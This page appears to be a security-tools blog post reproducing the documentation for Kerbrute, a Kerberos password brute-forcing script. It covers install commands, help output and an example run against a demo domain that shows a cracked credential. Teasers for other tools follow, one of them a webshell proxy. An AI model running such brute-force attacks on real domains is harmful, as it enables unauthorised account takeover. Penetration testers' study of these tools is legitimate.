Kerbrute is a script to perform kerberos bruteforcing by using the Impacket library.
When is executed, as input it receives a user or list of users and a password or list of password. Then is performs a brute-force attack to enumerate:
As a result, the script generates a list of valid credentials discovered, and the TGT’s generated due those valid credentials.
From pypi:
pip3 install kerbrute
From repo:
git clone https://github.com/TarlogicSecurity/kerbrute
cd kerbrute
pip install -r requirements.txt
Help without arguments:
root@kali:~# kerbrute
Impacket v0.9.18 – Copyright 2018 SecureAuth Corporation
usage: kerbrute.py [-h] [-debug] (-user USER | -users USERS)
[-password PASSWORD | -passwords PASSWORDS] -domain DOMAIN
[-dc-ip ] [-threads THREADS]
[-outputfile OUTPUTFILE] [-no-save-ticket]
optional arguments:
-h, –help show this help message and exit
-debug Turn DEBUG output ON
-user USER User to perform bruteforcing
-users USERS File with user per line
-password PASSWORD Password to perform bruteforcing
-passwords PASSWORDS File with password per line
-domain DOMAIN Domain to perform bruteforcing
-dc-ip IP Address of the domain controller
-threads THREADS Number of threads to perform bruteforcing. Default = 1
-outputfile OUTPUTFILE
File to save discovered user:password
-no-save-ticket Do not save retrieved TGTs with correct credentials
Examples:
./kerbrute.py -users users_file.txt -passwords passwords_file.txt -domain contoso.com
Example of execution:
root@kali:~# kerbrute -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
Impacket v0.9.18 – Copyright 2018 SecureAuth Corporation
[] Stupendous => triceratops:Sh4rpH0rns [] Saved TGT in triceratops.ccache
[] Valid user => velociraptor [NOT PREAUTH] [] Valid user => trex
[*] Saved discovered passwords in jurassic_passwords.txt
Pystinger is a Python-based tool that enables SOCKS4 proxying and port mapping through webshells. It…
Introduction When it comes to cybersecurity, speed and privacy are critical. Public vulnerability databases like…
Introduction When it comes to cybersecurity, speed and privacy are critical. Public vulnerability databases like…
If you are working with Linux or writing bash scripts, one of the most common…
What is a bash case statement? A bash case statement is a way to control…
Why Do We Check Files in Bash? When writing a Bash script, you often work…